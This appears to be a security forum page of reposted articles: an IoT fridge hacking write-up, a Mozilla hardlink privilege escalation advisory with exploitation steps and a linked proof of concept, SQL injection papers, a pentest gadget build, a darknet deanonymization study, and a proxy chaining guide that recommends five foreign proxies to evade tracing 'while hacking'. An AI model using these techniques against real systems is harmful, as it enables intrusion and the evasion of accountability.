Nytro

You have the code that does this here: https://github.com/NytroRST/NetRipper Read and understand.

A aplicat cineva la Call for Papers/Presentations?

No. You declare a pointer, an uninitialized pointer, and allocate space based on "strlen(uninitialized pointer)"? @StoneIce: char fname[35] ="Shawn Little"; NOT char* fname[35] ="Shawn Little"; char namez[50]; namez = (char*) malloc(50*sizeof(char)); It is either char namez[50] OR char *namez=(char *)malloc(...) but NOT both. Come on, C is not that complicated. Just RTFM.

In sfarsit un tutorial pe care chiar il citeste lumea. Sau cel putin se uita la poze.

Such security. Much wow. Pentest.

Hacking DefCon 23’s IoT Village Samsung fridge Posted on Tuesday, August 18th, 2015 by Pedro Venda. As well as running the Hacking You Fat: The FitBit Aria workshop at DefCon 23’s IoT Village this year (more on that later) we also thought we’d take on their big fridge challenge: “Can you own our #IoT #Samsung - RF28HMELBSR fridge ::] @_defcon_”. As a team we’re doing more and more IoT research and hacking so this was a great opportunity to work on something we can’t get our hands on in the UK yet. It was a full-on team effort over the course of a day, so I’ve gathered everyone’s notes here. What’s the fridge? In the summer of last year Samsung brought out their RF28HMELBSR smart fridge, the successor to the RF4289HARS from two year previous. The fridge is part of Samsung’s line-up of Smart Home appliances which can be controlled via their Smart Home app. Man in the middle attack Whilst the fridge implements SSL, it FAILS to validate SSL certificates, thereby enabling man-in-the-middle attacks against most connections. This includes those made to Google's servers to download Gmail calendar information for the on-screen display. So, MITM the victim’s fridge from next door, or on the road outside and you can potentially steal their Google credentials. The notable exception to the rule above is when the terminal connects to the update server - we were able to isolate the URL https://www.samsungotn.net which is the same used by TVs, etc. We generated a set of certificates with the exact same contents as those on the real website (fake server cert + fake CA signing cert) in the hope that the validation was weak but it failed. The terminal must have a copy of the CA and is making sure that the server's cert is signed against that one. We can't hack this without access to the file system where we could replace the CA it is validating against. Long story short we couldn't intercept communications between the fridge terminal and the update server. Google Calendar service The fridge runs Google calendar, so you can set events and generally boss your family around from the fridge screen! It’s a usable feature and one that hasn’t gone without its own share of API update bugs This should have been an excellent route to get content on to the fridge; attaching tags and more to calendar entries. However, as HTML and other mark-up is not interpreted we couldn’t get a foot hold there either. Firmware attack We also looked at the possibility of faking a firmware update to compromise the unit via malicious custom update. We found the URL scheme to download the file, but we still need to find out a number of parameters to complete the URL. These are not secret things, just difficult to guess, like a code name for the model of the device, likely a serial number, etc. TCP services and certificate challenges The fridge's terminal has at least 2 listening services. One on port 4444 (SSL) and one on port 8888. The service on port 4444 requires a client side certificate for most requests, though not all are validated against the client side cert. We suspect this is used by the mobile app and therefore the cert must be located in the mobile app code. The mobile app We pulled apart the mobile app and found what we believe is the certificate inside a keystore. We “believe” we did because it is has a name that suggests this. However, it is correctly passworded and we are yet to extract the password that opens the key store. We think we’ve found the password to the certificate in the client side code, but it’s obfuscated and we haven’t got round to reversing it, yet. Conclusion …and that's how far we got. We wanted to pull the terminal unit out of the fridge to get physical access to things like a USB port and serial or JTAG interfaces, but ran out time. However, we still found some interesting bugs that definitely merit further investigation. The MITM alone is enough to expose a user’s Gmail creds. The fridge STILL isn’t shipping in the UK, nor can we find any other Samsung smart fridges on the market here. Sursa: http://www.pentestpartners.com/blog/hacking-defcon-23s-iot-village-samsung-fridge/

[h=1]Native Java Bytecode Debugging without Source Code[/h]12 Feb 2014 Jason Geffner At CrowdStrike, we’ve seen a moderate increase in Java-based malware recently, with Remote Access Tools (RATs) like Adwind becoming increasingly prevalent. Reverse engineering Java is typically very straightforward, since excellent Java binary decompilers have existed for years. Tools like JD-GUI make Java analysis a breeze and do an excellent job at recovering Java binaries’ source code (minus the comments). In cases where we need to dynamically debug Java programs, decompiled Java can be exported from the decompiler and then imported into a Java IDE like Eclipse as part of a new Java project. This allows us to build a project using the decompiled code and then dynamically debug it through the IDE. However, this all goes out the window when dealing with Java bytecode-based obfuscation, as most Java IDEs won’t compile raw JVM instructions, nor allow you to step through these instructions without the original source code. Decompiled Non-Obfuscated Java Decompiled Obfuscated Java The best solution we’ve found for debugging malware’s native Java bytecode is Dr. Garbage’s Bytecode Visualizer. We haven’t seen any thorough walkthroughs on installing and using Bytecode Visualizer, so this blog entry serves as a step-by-step guide on how to dynamically analyze native Java bytecode with Bytecode Visualizer: [h=2]1. Install the Java SE JDK[/h] The Java Standard Edition Development Kit can be downloaded from Oracle’s website at http://www.oracle.com/technetwork/java/javase/downloads/index.html. JDK 7 is currently the latest version and can be downloaded directly from http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html. During the JDK installation, be sure to have the JDK installer install the Public JRE as well if it isn’t already installed: Installation Options [h=2]2. Install Eclipse[/h] The Eclipse IDE for Java Developers can be downloaded from https://www.eclipse.org/downloads/packages/eclipse-ide-java-developers/keplersr1 (the download links are on the right side of the page). [h=2]3. Install Bytecode Visualizer[/h] Run Eclipse and in the menu bar go to Help ? Eclipse Marketplace… In the Search tab of Eclipse Marketplace window, type “Dr. Garbage” into the Find textbox and press the Go button: Eclipse Marketplace Scroll to Bytecode Visualizer and press the Install button. Once installation is completed, restart Eclipse when prompted. [h=2]4. Load the JAR to be Analyzed[/h] Once Eclipse restarts, close the Welcome tab, and in the menu bar go to File ? New ? Java Project. Specify any project name you like and press the Next button: Create a Java Project In the Java Settings window, click the Libraries tab. In the Libraries tab, press the Add External JARs button and select the JAR file you want to debug, thereby adding it to the Java project’s build path: Java Settings Once the JAR has been added to the build path, press the Finish button. [h=2]5. Open the JAR’s Code with Bytecode Visualizer[/h] In the Package Explorer tab, expand your project’s Referenced Libraries to find your JAR file. Right-click on the class you want to debug and select Open with Bytecode Visualizer: Open with Bytecode Visualizer [h=2]6. Set Breakpoints[/h] With the JAR’s code now visible in Bytecode Visualizer, you can set breakpoints by double-clicking on the vertical gray bar to the left of the disassembled Java code: Setting a Breakpoint Note that Bytecode Visualizer only allows you to set breakpoints on method entrypoints (the first instruction of a method); you can’t set breakpoints on arbitrary instructions. [h=2]7. Debugging the Disassembled Code[/h] You can now run the disassembled code by right-clicking on the class you want to debug and choosing Debug As ? Java Application: Debug as Java Application In the Debug perspective view, there are buttons to Step Into Bytecode and Step Over Bytecode (circled in red below). Use the Step Over Bytecode button to perform standard single-stepping; use the Step Into Bytecode button only to step into calls. The Debug perspective also allows you to see local variable in the Variables tab, and to add your own watches in the Expressions tab (you can add this tab via Window ? Show View ? Expressions in the menu bar); you can see below that I added a watch/expression for variable b: Debug Perspective As far as we’ve seen, Bytecode Visualizer does not offer a view of the raw JVM stack, but even without it, tracing the code flow via single-stepping and examining memory with the Variables and Expressions tabs should typically allow you to successfully debug your target as needed. For more information on Java-based malware or the adversaries using it, including detection logic or any of the adversaries tracked by CrowdStrike, please contact: intelligence@crowdstrike.com and inquire about our Intelligence subscription. Sursa: http://blog.crowdstrike.com/native-java-bytecode-debugging-without-source-code/

By SexyCyborg · 4 days ago · 37 images · 184,121 views · stats I’ve been watching the TV show "Mr. Robot" and while I know not all of it is accurate some of it is and it got me curious. I’m already pretty comfortable with command line and remote server administration from my web development work, and it turns out a lot of ‘hacking’ tools are just testing tools any sensible IT professional would use- just without a GUI. So I spent this month hitting the books (well web pages) watching lots of videos and learning a bit about information security and penetration testing (I wonder how many idiot jokes that phrase is going to cause…). I still don’t know much, but I know a tiny bit more than I did. Enough to ask people who know more than me the right questions- and enough for a fun project. So I got to thinking- if I had to do penetration testing on a corporate facility, how would I do it? Social engineering for one- I’m a natural honeypot. I think there's a reasonable chance that a guy might invite me back to their office after a few drinks in the neighborhood? But a handbag would be suspicious and leaving cell phones at the gate would be standard practice in any reasonably secure facility. My typical clothing does not leave room to hide anything- but that’s all the more reason they would not be suspicious of me. So I devised the Wu Ying Shoes (???)! - Penetration Testing Platform Heels! "Wu Ying" means “shadowless", the name is from the folk hero Wong Fei Hung’s (???) famous "shadowless kick" (???). Wong Fei Hung is from Foshan, which is my ancestral home as well as the ancestral home of Bruce Lee. As legend has it, to execute the "shadowless kick" Wong would distract his opponent with a punch or upper body move while striking with his foot. With my shadowless shoes I distract the target with my…upper body and they don’t see the real danger on my feet:-) Also I get tired of English names for everything. If we are ever going to stop copying Western things we should stop copying Western names as well right? So "Wu Ying Shoes". Each shoe has a drawer that can be slid out without my having to take the shoes off. This drawer can be customized for various payloads. (Just FYI- of course I asked the staff for spray and a cloth to wipe off the table carefully after I took these pictures). For the purposes of this first test version, my right shoe contains a pen testing drop box. This is a wireless router running OpenWRT with a built in rechargeable battery that could either be left running inside the shoe (for war-walking, wifi sniffing and logging etc) or could be removed and plugged into a convenient open network jack as soon as I was inside and had direct access to the LAN. Once this is done you can gain remote access anytime you want via SSH tunnel. Installing OpenWRT on the TL-MR10U is just like upgrading the firmware on any router. It’s two links and a button- nothing to it. There’s a lot of different software you can run once you have OpenWRT flashed. This router may-or-may-not be running a custom version of Wispi for the TP-Link TL-MR10U because if it was it would probably be illegal in China so maybe its not. But if it was I could run Jasager/Karma which lets you can fake being a friendly/known wifi access point and setup a fake login page to capture passwords, among other cool tricks. Wispi also has a few other handy utilities that you should never use in the real world but are pretty cool to try at home once or twice just so you know how. In my left shoe there is a USB keystroke recorder. This is a pass-through device that goes into the back of the computer where you normally plug the keyboard in and records everything typed on the keyboard (so all passwords) in it’s built in memory. A retractable ethernet cable for the OpenWRT router. A shim for opening padlocks. …and a basic lock pick set for gaining access to network cabinets, file drawers etc. I learned how to use the picks at a Locksport meet-up. I can only do simple locks but still loads of fun! Like little metal puzzles... Here’s the model I made for 3D printing. I’m sticking with TinkerCAD just to annoy all the CAD snobs who keep commenting on it ;-P I had to print it at 0.3mm so the layers are a little coarse. It was taking forever at 0.2mm (what I did my LED skirt control box at). Still looks decent. That’s PLA plastic. Infill is 20% and it supports my weight without any issues. Each shoe weighs about the same as a normal, non-printed shoe. Obligatory denim overalls work-clothes shot for the boys. You know the world is a strange place when fan-service is overalls and the slutty mini-dress is “meh". Removing the support structure. This kind of 3D printer can’t really do an overhang over 45% or so since each layer has to rest on the one below. Sacrificial columns are printed to support the overhang for printing and then peeled away afterwards. Source files are here if you'd like to make your own: http://www.thingiverse.com/thing:980191 LibraryBox can be a good way to share movies and ebooks with friends if you are traveling or don’t have wifi. I could see Piratebox being useful in time of disaster for sharing information when the wireless networks are down. It’s kind of like a mini-NAS. Wispi and Pentest drop boxes should of course should only be experimented with at home for educational purposes. While it’s good to know about this stuff always obey your local laws. People think all sorts of crazy stuff about China and I don’t want to talk politics- but my city Shenzhen is a really, really cool place to live (think Bladerunner) so there’s really no reason to do dumb stuff. As always- thanks to my friends for helping to clean up my English above. I had a ton of technical help but I follow a strict “don’t do it for me, show me how” rule so learned a tremendous amount. As I’ve also mentioned before, I’m not much more technical than my female friends but I am patient, good at following tutorials and and asking questions. If you can follow a recipe I assure you that you could do this sort of thing also. Any women with questions about teaching themselves online should feel free to contact me on Reddit and I’d be delighted to offer any help I can. Remember ladies- if you are thinking about becoming a Maker, learning to code or doing hardware; if a girl who looks like me can do it, how hard can it really be? Edit: Normally I have to sort though about 50% identical replies to my posts on Reddit. For those flexing their fingers and getting ready to give me a hard time: Yes, they are fake. Yes, I feature them prominently and deliberately in everything I do. No, most of my projects do not have all that much technical merit- they are 90% silicone and 10% silicon ;-) No, if you point out the absolutely obvious no one will think you are insightful, edgy or cool. They will think you are 12. Sursa: http://imgur.com/a/c4WNF#PEc4q1x

MySQL Error Based SQL Injection Using EXP Table of Contents Overview Injection Extracting Data Dump In One Shot Reading Files Injection in Insert Injection in Update Injection in Delete Conclusion References Download: https://www.exploit-db.com/docs/37953.pdf

The PenTesters Framework (PTF) A TrustedSec Project - Copyright 2015 Written by: David Kennedy @hackinGDave The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustom to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important. PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you. The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minute. Sursa: https://github.com/trustedsec/ptf

Proxy Chaining We live in a world where privacy has an important role in our day-to-day life. The activities we perform using the Internet can tell a lot about a person’s social and professional life. In the wrong hands, this information could result in various problems. Data collected could be used to hack bank accounts, social media accounts etc. Due to this reason, people choose to be anonymous while using internet, using a proxy. A proxy could be explained as a gateway between the user computer and the destination webpage. Normally while browsing through the website, your original IP is identified by the website, which could compromise your privacy. By the use of proxy chaining we bounce through a number of proxy servers and reach the destination. While using a proxy server you are not directly connected to the website. The proxy connects to the website and creates a cached version of the site and sends it to you, like a photocopy. If a proxy visits a website, then the page is cached in the proxy server. The next time someone visits the page, the proxy server loads from the cached page. This speeds up the process to an extent. If you check the IP that’s connected to internet, it will be the ISP IP. But when using proxy server and chaining the IP displayed will be the last used proxy server’s IP in the chain. User ———-> Proxy ———–> Webpage Proxy Chaining is connecting two or more proxy servers to obtain the intended page. We can use asmany proxies as we want. Let’s see an example as shown below: User ———–> Proxy1 ———–> Proxy2 ———–> Proxy3 ———–> Proxy4———–> Webpage The user connects to proxy1 and from there to the next proxies as specified by the user until it finally reaches the destination. When the destination end searches for the IP, the Proxy4 IP is displayed as the user’s IP. While using proxy chaining we have to make sure that the entire proxy server included in the chain are working properly. If any proxy IP fails to work, this means the connection can’t be established. Then we have to replace the damaged proxy with a new one or exclude the damaged IP and connect the rest forming a new chain. Sometimes it can be a bit difficult to figure out which proxy has misfunctioned, if you are using too many proxies. Proxy chaining is also used while carrying out an attack. It is a must if you are attempting to gain unauthorized access to any server. Even if you use proxy chaining you can’t be 100% anonymous. You could be traced on the basis of each proxy used to establish a connection. It just makes it a lot harder to track. If you use foreign proxies, then it will be more complicated to find someone. Tracking could be done only by collecting the logs of each proxies used from the administrator. This could take a lot of time if we use a foreign proxy. As the time passes, it becomes more difficult to track a person. Administrators delete the logs after a certain period of time. Once the log is gone, it’s just impossible to track the IP back. So while hacking, it’s advised to use at least 5 foreign proxies in a chain. One of the main factors that is needed to be taken in consideration when using proxy chaining is the connection speed. Each server might have a different connection speed and lag according to their configuration. So during chaining there may be chance of a slow net speed due to lag in each server. The total lag while connecting to a page could be said as the sum of individual lags at each server. This gets worse if we are using more number of proxies in the chain. Browser Chaining Browser chaining is an easy process. We make use of the browser for chaining proxies. This will work only for the requests made through the browser. Let’s see how this can be done using Internet explorer browser. First, open the browser and go to “Internet options” in the settings menu. A window will appear with a few tabs at the top as shown in the figure below : Figure 1 : Internet Option window in Internet Explorer. Now, click on the Connections tab from the available tabs and select “LAN settings” button. A small window will pop up after clicking on the LAN settings button as shown below: Figure 2: LAN Settings window to specify Proxy server details. Check the “Use a proxy server” box in the window to type in the proxy server details in the field. If you just need to use a single proxy, then type in the IP and port number and click ok. To use proxy chaining, click on the advanced button and type in the proxy IP followed by the port number in the box provided. Leave a space between each proxy IP. Now all the connections made from the browser is through the specified proxy servers. There are various software that helps us to carryout proxy chaining. Let’s discuss about one such piece of software called “Proxifier.” Proxifier It’s a simple piece of software that helps us to connect to various proxy servers across the world. All we have to do is type in the proxy IP, port number, and the socket type. While making use of proxy chaining there are some points you should remember: A proxy chain can contain various types of proxy servers like SOCKS v4, SOCKS v5, HTTPS etc. If using HTTP proxy, it should be placed at the last in the chain. The entire chain will not work if one proxy goes down. The total lag will be the sum of all individual lags in the chain. Figure 3: Proxifier window This software has a variety of functions. The connections space as shown above in Figure 3 will display all the connections established form the particular system. The total time, data exchanged etc can be easily sorted out using this software. We can save the log according to our need. The connections made could be encrypted as per the user’s requirement and various other options are available in this software. Click on the first icon in the panel called Proxy server configuration. A window will open up with a black space type in the proxy server details. You can create a number of chains and select them accordingly using this window. The window is as shown below: Figure 4: Filling in proxy server details The order of chain will be as specified in the list as shown in the figure above. We can drag and change the order according to our need. There will be a check box to enable and disable each proxy in the chain. There is also a proxy checker tool integrated to this software, which is a very helpful one. Under “View” in toolbar click on proxy checker to start checking the proxies. Some of the proxy servers available are disabled by the administrators due to various reasons. So to checking the servers before connecting it to the internet is a good idea. This tool could be used to check the status of the server. All we have to do is to specify the server address and the socket type with IP and click the check button. If it’s a working proxy a message will be shown after the test that it’s ready to use with proxifier. TOR Tor is a browser that helps us to browse anonymously making use of various proxy server available. In here we cannot specify proxy servers. But the browser itself skips through a few servers which are provided by the TOR network. It helps us to reach blocked destination or view censored contents by the help of the available channels. I would not recommend TOR for extreme hacking purposes, but normal browsing could be done easily. All we have to do is to install the browser and type in the required page address. TOR’s hidden services help us to publish websites and other services without revealing the original location. Tor is mainly used against a common form of internet surveillance called “traffic analysis”. This is used to keep an eye on the activities of a public network. TOR cannot completely hide you from attackers. It protects the packets sent from your end by encrypting it and also by passing through various channels to make it hard for other to track. However, with sophisticated tools and efforts they could find information about your identity. As the number of users in TOR increases, the number of source and destination in the network increases accordingly, increasing the security for everyone in the network. Some NGOs recommend the users to browse from TOR to hide their identity to the outer world. A branch of U S Navy uses TOR for open source intelligence. They use TOR for visiting websites without leaving government IP to their website log. The path selected by the browsers changes from time to time. There may be various nodes in between the connection. All this connections will be encrypted in the Tor network and the connection from the last node to the destination will be open. So when the website checks its log, only the last node path will be visible, keeping user’s privacy. Figure 5: TOR Browser ProxyHam ProxyHam brings a whole new level for being anonymous. It’s a proxy device made by Ben Caudill which adds a radio connection to the users layer giving absolute protection. This device connects to Wi-Fi and relays a users internet connection over a 900 MHz radio connection to a faraway computer. ProxyHam has a range of about 2.5 miles (4 km approx). Even if the investigator fully traces the connection, they will only find the ProxyHam placed 4 km away from your original location. Device mainly consists of two parts. First one consists of Raspberry Pi computer connected to a Wi-Fi card and a small 900 MHz antenna which is to be kept at a far away location from yours. The other end consist of a 900 MHz antenna plugged in to the users Ethernet port. Figure 6: ProxyHam Proxy Website Service There are various proxy websites that offer proxy services. Some of them may have a chain of servers behind and some of them just one or two. These websites are mainly used to access blocked websites or pages. Some of the Youtube videos are blocked in certain countries. These websites help us to view such blocked contents easily. The following is a list of such websites that offer this kind of service: https://www.filterbypass.me/ https://www.proxysite.com/ https://hide.me/en/proxy https://kproxy.com/ https://zend2.com/ http://www.proxywebsite.org/ http://000freeproxy.com/ https://www.hidemyass.com/proxy There are some integrated browser add-ons like anonymox that provide proxy services. They have a small window, which allows us to select from available servers so that we could connect it to the destination. We cannot trust completely an such add-on. They might give a shield from normal scanning but on a thorough analysis the user IP could be easily determined. And also the number of available proxies is limited in such cases. So, this type could only be used for normal browsing purposes. The anonymox window is as shown below: Figure 7: Anonymox window. Conclusion Proxy chaining is a simple but effective method to stay anonymous over the internet. Not only hackers but normal users can also make use of such services to protect their privacy over the internet. Black hat hackers make use of several tools and software to switch between the proxy servers all over the world, which makes them very hard to track. By the use of normal browser and add-ons you won’t get much security, but to an extent these could be used for day to day browsing purposes. We might also consider the internet speed while using such intermediate servers. If it’s a popular website which the server has already cached, then the response time will be remarkable. These websites are loaded from cache database. When accessing a new webpage it takes a bit to load due to the lag in the intermediate servers. Now that we know how proxy chaining works, we can carry out our activities with relative anonymity. I used “relative” because there is no way to remain completely anonymous with the NSA spying across the globe. All we can do is to make detection a bit harder using proxy chaining. Reference http://www.claro.com.ec/Docs/hlzproxp.html http://www.hackershandbook.org/tutorials/proxychaining https://technet.microsoft.com/en-us/library/cc995172.aspx http://www.freeproxy.ru/en/free_proxy/faq/what_is_proxy_chaining.htm http://www.techgyd.com/free-proxy-sites-list-2014/12890/ http://www.publicproxyservers.com/proxy/list1.html https://www.torproject.org/about/overview http://www.backtrack-linux.org/forums/showthread.php?t=1496 https://www.owasp.org/index.php/Chaining_WebScarab_onto_another_proxy Author Steve Lynch Sursa: http://resources.infosecinstitute.com/proxy-chaining/

SQL Injection Optimization and Obfuscation Techniques By Roberto Salgado Introduction SQL Injections are without question one of the most dangerous web vulnerabilities around. With all of our information stored in databases, almost every detail about our lives is at the mercy of a simple HTTP request. As a solution, many companies implement Web Application Firewalls and Intrusion Detection/Prevention Systems to try to protect themselves. Unfortunately, these counter measures are not sufficient and can easily be circumvented. This is all possible due to optimization and obfuscation techniques which have been perfected over the last 15 years since the discovery of this lethal vulnerabil ity. Even though firewalls cannot not be relied on to prevent all attacks, some firewalls can be effective when used as a monitoring tool. It is not unheard of for an attacker to be detected and blocked during mid-attack, due to firewall triggers and an alert security team. Because of this, a SQL Injection that has been optimized and obfuscated has a much higher probability of being successful; it will extract the data faster and remain undetected for longer. In this paper we will discuss and compare a variety of optimization methods which can be highly effective when exploiting Blind SQL Injections. We will also introduce SQL queries which can be used to dump the whole database with just one request, making it an extremely easy to quickly retrieve data while going unnoticed. Furthermore, we will be reviewing several obfuscation techniques wh ich can make a SQL Injection unrecognizable to firewalls. When combined, these techniques create a deadly attack which can be devastating. Download: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf

[h=1]Mozilla Maintenance Service Log File Overwrite Elevation of Privilege[/h] Source: https://code.google.com/p/google-security-research/issues/detail?id=427&can=1 Mozilla Maintenance Service: Log File Overwrite Elevation of Privilege Platform: Windows Version: Mozilla Firefox 38.0.5 Class: Elevation of Privilege Summary: The maintenance service creates a log file in a user writable location. It’s possible to change the log file to a hardlink to another file to cause file corruption or elevation of privilege. Description: When the maintenance service starts it creates a log file under c:\programdata\mozilla\logs. This is done in maintenanceservice.cpp/SvcMain. This directory it creates the file in has fairly permissive permissions which allows a normal user to create new files underneath that directory. It’s possible to race the creation of the log file during the service initialization to drop a hardlink to an existing file on the same drive (which is probably the system drive) which when opened by the maintenance service running as local system will cause the file to be overwritten by the log data. At the very least this would corrupt the target file, however as the user has some control over bits of the contents, such as the updater path, it’s possible to get some user controlled contents in there. This might be used to elevate privileges by overwriting a script file which has a permissive parser, such as powershell, batch or HTA which subsequently gets executed by a privileged process. The only slight difficulty in exploitation is that the user cannot directly delete the log file to replace it with a hardlink. However this isn’t a significant issue as before opening the log file the service backs up the log to a new name leaving the directory entry for “maintenanceservice.log” free. Therefore there’s a race condition between the log file being moved out of the way and the new log file being created. So to exploit this you perform the following operations: 1. Start a thread which creates a hard link in the log directory to the file you want to overwrite. Repeat until successful. 2. In another thread start the service passing the arbitrary content you want to insert as the path to the updater file A similar vulnerability exists in the update.status handling, for example in WriteStatusFailure which will write update.status to any location you specify. You can use a hardlink to force the file to be overwritten. In this case this would only cause file corruption as the user has no real control on the contents. If I could recommend fixes either make the logs directory writable only by administrators or use CopyFile instead of MoveFile when backing up the previous logs. I would not recommend trying to do anything like inspecting the file for hardlinks or similar. Proof of Concept: I’ve attached a proof of concept, it’s written in C#. You’ll need to compile it with the C# csc compiler. NOTE: you might need to run this on a multi-core machine to stand a chance of winning the race. 1) Compile the PoC 2) Execute the PoC passing the name of a file you want to overwrite on the command line 3) Program should run and print Done if successful Expected Result: The log file is created as normal Observed Result: The target file has been overwritten with the contents of the log file Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37925.zip Sursa: https://www.exploit-db.com/exploits/37925/

Schimb?ri majore în Firefox: web browserul va folosi extensii Chrome ?i procese separate pentru taburi Aurelian Mihai - 24 aug 2015 Mozilla preg?te?te schimb?ri importante în web browserul Firefox, stricând compatibilitatea cu extensiile folosite de actuala versiune de Firefox. În plus, vor fi implementate optimiz?ri menite s? creasc? performan?ele resim?ite, îmbun?t??ind totodat? stabilitatea ?i protec?ia oferit? împotriva amenin??rilor cu malware. Schimb?ri majore în Firefox: web browserul va folosi extensii Chrome ?i procese separate pentru taburi Astfel, dezvoltatorul Firefox va înlocui API-ul folosit de actuala colec?ie de extensii Firefox cu WebExtensions. Similar celui folosit de Google Chrome ?i Opera, noul API permite adaptarea rapid? a extensiilor Chrome ?i Opera pentru folosire cu Firefox. Pentru dezvoltatori, trecerea la formatul WebExtensions înseamn? o reducere a costurilor ?i mai mult? u?urin?? în adaptarea extensiilor pentru web browsere diferite. Noul format de extensii va debuta într-o nou? versiune mai rapid? de Firefox, preg?tit? în ultimii doi ani sub numele de proiect Electrolysis. Aceasta face trecerea la o nou? arhitectur?, în care web browser-ul este ?spart„ în procese multiple, câte unul pentru fiecare tab sau extensie înc?rcat?, oferind un beneficiu important din punct de vedere al stabilit??ii ?i securit??ii, penalizarea fiind doar consumul ceva mai ridicat de memorie. Desigur, dezvoltatorii care doresc s? ofere în continuare extensii pentru Firefox vor trebui s? fac? modific?ri pentru saltul la noua versiune. În plus, începând cu data de 22 septembrie, odat? cu lansarea versiunii Firefix 41, toate extensiile vor trebui validate ?i autentificate cu semn?tur? digital? de c?tre Mozilla, sistemul anterior de validare a extensiilor nemaifiind de actualitate. Din fericire Mozilla a l?sat timp suficient pentru adaptarea extensiilor, trecerea la noul API urmând s? se produc? abia din data de 15 decembrie, odat? cu lansarea versiunii Firefox 43. De la acea dat?, extenziile Firefox nemodificate vor continua s? func?ioneze timp de 6 luni, dup? care Mozilla va elimina definitiv compatibilitatea cu acestea. Din aceast? tranzi?ie, de departe cei mai afecta?i vor fi dezvoltatorii specializa?i în lansarea de extensii în mod exclusiv pentru web browserul Firefox. Mozilla apreciaz? c? schimbarea va fi f?cut? cu ?efort considerabil? din partea dezvoltatorilor nevoi?i s?-?i porteze extensiile la noul API, îns? compania apreciaz? c? ?rezultatul va merita cu prisosin?? efortul depus?. În schimb, pe termen lung, utilizatorii Firefox vor avea la dispozi?ie ?i mai multe extensii pe care dezvoltatorii le vor putea adapta cu mai pu?in efort de la o platform? la alta. Sursa: Schimb?ri majore în Firefox: web browserul va folosi extensii Chrome ?i procese separate pentru taburi

System calls in the Linux kernel. Part 1. Introduction This post opens new chapter in linux-insides book and as you may understand from the title, this chapter will devoted to the System call concept in the Linux kernel. The choice of the topic for this chapter is not accidental. In the previous chapter we saw interrupts and interrupt handling. Concept of system calls is very similar to interrupts, because the most common way to implement system calls as software interrupts. We will see many different aspects that are related to the system call concept. For example, we will learn what's happening when a system call occurs from userspace, we will see implementation of a couple system call handlers in the Linux kernel, VDSO and vsyscall concepts and many many more. Before we will start to dive into the implementation of the system calls related stuff in the Linux kernel source code, it is good to know some theory about system calls. Let's do it in the following paragraph. System call. What is it? A system call is just an userspace request of a kernel service. Yes, the operating system kernel provides many services. When your program wants to write to or read from a file, start to listen for connections on a socket, delete or create directory, or even to finish its work, a program uses a system call. In another words, a system call is just a C function that is placed in the kernel space and an user program can ask kernel to do something via this function. The Linux kernel provides a set of these functions and each architecture provides its own set. For example: the x86_64 provides 322 system calls and the x86 provides 358 different system calls. Ok, a system call is just a function. Let's look on a simple Hello world example that written in assembly programming language: Articol complet: https://github.com/0xAX/linux-insides/blob/master/SysCall/syscall-1.md

Deanonymization Made Simple cbcf9dde327c475d99627c87f58cab7ac6689164bf2fe7734c10c78005ed118e == sha256(“[10.08.2015] I’ve discovered that about 2% of the known darkweb is controlled by one organization.”) Reading articles of deanonymization of hidden services by controlling certain nodes or conducting correlation attacks, I came to an idea that in certain cases it might be much easier to break anonymity. Just by having the same vulnerabilities as in “clearnet”, applications can expose sensitive information and let an attacker gather data from the system and deanonymize the target, with certain “darknet” specifics in the approach. According to the results of the recent HyperionGray research of scanning the darkweb with PunkSPIDER, approximate number of alive dark services is about 7000. The guys took alive and not-so-hidden services and started to scan those for serious vulnerabilities. I’ve started my own research with slightly different approach - in opposite to searching for critical vulnerabilities like OSCI/SQLi, I’ve taken a closer look to conventionally low-risk information disclosure. For that I’ve written a simple Python script which, when provided with server/framework, would enumerate accessible files and folders and probably discover certain leaks of server information. To my surprise, fair amount of them actually had quite lame generic server authorization/configuration issues up to world-readable /phpinfo.php. The most helpful and common fail pattern was, however, the default Apache pages such as /server-info and /server-status. Whereas the first one would give you a nice picture of the server information with current settings, modules and its configuration (and IP address, of course), the second is more valuable in terms of current connections. In a given set of 7k+ alive services almost 500 of them (about 7%) appeared to be vulnerable. Further analysis showed that large-traffic applications are affected, too. [TABLE] [TR] [TD][/TD] [TD][/TD] [/TR] [/TABLE] For one of the websites I’ve noticed, that it has several other hosts with completely different kinds of subjects. The only thing which was the same, were those /server-status pages all among them. Quick gather of references on those revealed more than 300 unique services with traffic as much as 50+ Gb per day. Interestingly enough, most of them were referenced from HiddenWiki page, which also resided on the same server. A weaver! As appeared later, it was a hidden hosting service, where anybody could pay certain amount of BTC and rent it for his own dark intentions. Obviously, such disclosure makes it possible for deanonymizer to list all the queries to a particular domain on the hosting server and view parameters with corresponding values for GET requests with full paths to closed parts of the application. I was lucky again when my script warned me of an external IP address, which accessed “vps.server.com”. If you’ve ever had a look to access.log of your web server, for sure you’ve noticed a lot of connections of all kinds of bots which scan the Internet for vulnerabilities. That was probably the first time in my life, when I was really thankful to them. It meant the following: clearnet service is also available on port 80 if I manage to access it, my watcher script can isolate it One of the options to hit that is to basically try to scan the whole Internet on port 80. Sounds crazy? Hold on, check these projects first: Zmap and Massscan! What’s basically needed, is to access a specific IP address with certain marker, which would identify this IP address uniquely, and monitor such access on /server-status of a target server. I assumed that probably the easiest way to do it is to use the following vector: http://xx.xx.xx.xx/xx.xx.xx.xx. Results haven’t made me wait too long: Of course, this is not the only way to achieve that. The following scenario is even simpler: many clearnet hosts on the same server are used to redirect traffic to darknet, and this also helps a lot to deanonymize the target. One approach is quite similar to the previous one but more universal in a way that you don’t really need to have control over status page. It is enough to parse those responses, which return 30x code, and check for presense of “.onion” string in the “Location:” header: For the laziest of researchers, Shodan might help, too: Finally, researcher can always find a vulnerability in one weak service, and get access to the whole hosting server. Let’s say, I believe it’s possible 